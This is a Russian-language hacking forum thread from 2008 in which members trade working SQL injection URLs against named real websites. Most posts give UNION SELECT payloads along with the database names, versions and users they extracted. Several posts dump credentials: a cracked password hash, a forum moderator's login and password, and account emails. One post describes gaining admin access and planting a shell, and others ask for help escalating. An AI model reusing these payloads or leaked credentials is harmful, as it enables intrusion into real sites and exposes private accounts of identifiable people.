ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #6571  
Старый 09.09.2008, 14:39
Аватар для $n@ke
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813

Репутация: 1396


По умолчанию

Цитата:
http://www.knockers.org.uk/players.php?id=118+order+by+8--
Dbname:mycricket
Version:5.0.51a-community-log
User:lcs34@tango.rb.xcalibre.co.uk

Цитата:
members:
lynden:allen
========================================
Цитата:
http://www.sherlock-holmes.org.uk/event_info.php?id=141|SQL
DBname:sherlock_holmes
Version:4.1.22-standard
User:sherlock_general@localhost

Последний раз редактировалось $n@ke; 09.09.2008 в 18:40..
 
Ответить с цитированием

  #6572  
Старый 10.09.2008, 10:11
Аватар для Twoster
Twoster
Reservists Of Antichat - Level 6
Регистрация: 20.08.2008
Сообщений: 328
Провел на форуме:
7144817

Репутация: 1503
По умолчанию

http://www.aavba.org/

Скуль:
Цитата:
http://www.aavba.org/articles.php?Id=-1+union+select+1,USERNAME,password,4,5,6,7+from+us ers+limit+1,1/*
Логин: VBSLLC
хеш: 5b5f366f63b42b17
Расшифровка хеша: noodles1

Цитата:
user() - aavba@localhost
version() - 5.0.22
database() - aavba
В админке есть какая то биллинг панель, на счету 99 $, также на сколько я понял сайт
Цитата:
http://virtualbankruptcyservices.net
принадлежит этому же админу...
В общем, если кто дальше нароет, отпишитесь плиз!

И еще чуток разношерстных скулей:
Цитата:
http://www.sufficiencyeconomy.org/show.php?Id=-1+union+select+1,2,3,4,5,version(),7,user(),9,10,1 1,12,13,14,15/*
http://www.heizoel24.de/news.php?news_id=-1+union+select+1,user(),3,version(),database(),6/*
http://www.awrrtc.org/articles.php?id=-1+union+select+1,user(),version(),database(),5/*
http://www.sibezrcs.ru/articles.php?id=-1+union+select+1,user(),version(),4,database(),6,7 ,8,9,10,11/*
http://www.ladogorski.com/articles.php?id=-1+union+select+1,user(),version(),4,5,6,7/*
http://www.gloriahansen.com/articles.php?p=1&ID=-1+union+select+1,version(),3,user(),database(),6,7--
http://www.lynnmaloneyacupuncture.com/articles.php?ID=-1+union+select+1,2,version(),user()/*
http://www.4gr8teeth.com/articles.php?id=-1+union+select+1,user(),3,version()--

Последний раз редактировалось Twoster; 10.09.2008 в 12:15..
 
Ответить с цитированием

  #6573  
Старый 10.09.2008, 12:42
Аватар для $n@ke
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813

Репутация: 1396


По умолчанию

Цитата:
http://www.sensation.org.uk/index.php?p=10
Dbname: sensa_cms
Version: 4.1.22-standard
Username: sensa_website@localhost

password:username
Цитата:
test:alan@mtcmedia.co.uk
test:gordonkennovin@cxrbiosciences.com
test2:markchamberlain@cxrbiosciences.com
 
Ответить с цитированием

  #6574  
Старый 10.09.2008, 14:08
Аватар для AkyHa_MaTaTa
AkyHa_MaTaTa
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874

Репутация: 1020


Отправить сообщение для AkyHa_MaTaTa с помощью ICQ
По умолчанию

PageRank: 5 тИЦ: 110

http://www.amadeo-russia.ru/brand/?brand=-1+union+select+1,table_name,concat_ws(0x2f,version (),user(),database()),4,5,6/*
(вывод в титле)

интересные таблы:
ws_users
ws_users2
bof_users
cmf_users
chat_users
invforumapi_users
invforummeetings_user
users


админки я так и не нашел, скорее всего ее нету

Последний раз редактировалось AkyHa_MaTaTa; 10.09.2008 в 15:29.. Причина: обшибся
 
Ответить с цитированием

  #6575  
Старый 10.09.2008, 14:41
Аватар для Twoster
Twoster
Reservists Of Antichat - Level 6
Регистрация: 20.08.2008
Сообщений: 328
Провел на форуме:
7144817

Репутация: 1503
По умолчанию

И еще маленько:
Цитата:
http://www.theallergygroup.com/articles.php?id=-1+union+select+1,user(),3,version()/*

http://www.joelegecko.com/articles.php?id=-1+union+select+1,version(),user(),4,database(),6,7 ,8,9,10,11,12,13/*

http://profootballfocus.com/articles.php?tab=articles&arc=&id=-1+union+select+1,admin,password,4,5,6,7+from+membe rs--
(в поле admin выводит 0, выводит хеш пароля, но админку не нашел...)

http://www.u-coc.com/articles.php?id=-1+union+select+1,2,version(),database()/*
 
Ответить с цитированием

  #6576  
Старый 10.09.2008, 14:47
Аватар для $n@ke
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813

Репутация: 1396


По умолчанию

ппц как жрать охота..вот замена небольшая))
Цитата:
http://euclid.hamline.edu/~arundquist/php/mysql/movies/showmovie.php?movie_id=279
Name: test
Version: 4.1.22-log
Username: arundquist@localhost



ADD
============================================
Цитата:
http://www.celtnet.org.uk/mobile-phone/rt_readarticle.php?id=-1+union+select+username,password,3,email+from+user s/*
Database name: celtnet
Version: 4.1.19-standard-log
Username: celtnet@localhost

там пхпбб2 есть,но не будем тянуть хеши оттуда, так как логин и пасс покатят, и О ЧУДО, юзер окажецца админом....далее инклудим шелл и...а там кто что сможет)) при свежей BSDe (((

зы: куча команд отключена. советую попробовать include, ибо через passthru половина команд не досступна.(pwd катит).

Последний раз редактировалось $n@ke; 10.09.2008 в 19:05..
 
Ответить с цитированием

  #6577  
Старый 11.09.2008, 03:52
Аватар для Cennarios
Cennarios
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497

Репутация: 303
Отправить сообщение для Cennarios с помощью ICQ
По умолчанию

http://taro.in.ua/index.php?page=subarticle&id=-1+union+select+1,2,3,concat_ws(0x3a3a,username,pas sword),5,6,7,8+from+f_users/*

http://taro.in.ua/forum

login: Филиса <-модер
pass: draco
 
Ответить с цитированием

  #6578  
Старый 11.09.2008, 16:48
Аватар для lstsgoman
lstsgoman
Новичок
Регистрация: 05.09.2008
Сообщений: 3
Провел на форуме:
68503

Репутация: 0
По умолчанию

http://www.diza.in/pages/?id=-1+UNION+SELECT+1,concat_ws(0x3a,version(),database (),user()),3/*

4.1.22-log:intelco1_intelcom:intelco1_maxanda@localhos

Помогите узнать нвзвания таблиц ужо запарилсо...
 
Ответить с цитированием

  #6579  
Старый 11.09.2008, 18:05
Аватар для prescott
prescott
Участник форума
Регистрация: 28.07.2008
Сообщений: 158
Провел на форуме:
728470

Репутация: 115
По умолчанию

есть 100% инъекция:
http://www.product.ru/debetorShow.asp?IdDeb=20
http://www.product.ru/debetorShow.asp?IdDeb=21-1
НО union не проходит, IF не проходит, кто надет продолжение +10 в репу.
 
Ответить с цитированием

  #6580  
Старый 11.09.2008, 18:16
Аватар для [Dezzter]
[Dezzter]
Участник форума
Регистрация: 26.11.2007
Сообщений: 266
Провел на форуме:
3412198

Репутация: 341
По умолчанию

Цитата:
http://www.michaelpollan.com/article.php?id=-80+union+select+1,concat_ws(0x2f,version(),user(), database()),3,4,5,6,7,8,9,10/*
4.1.22-standard/pollan_article@localhost/pollan_articles
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ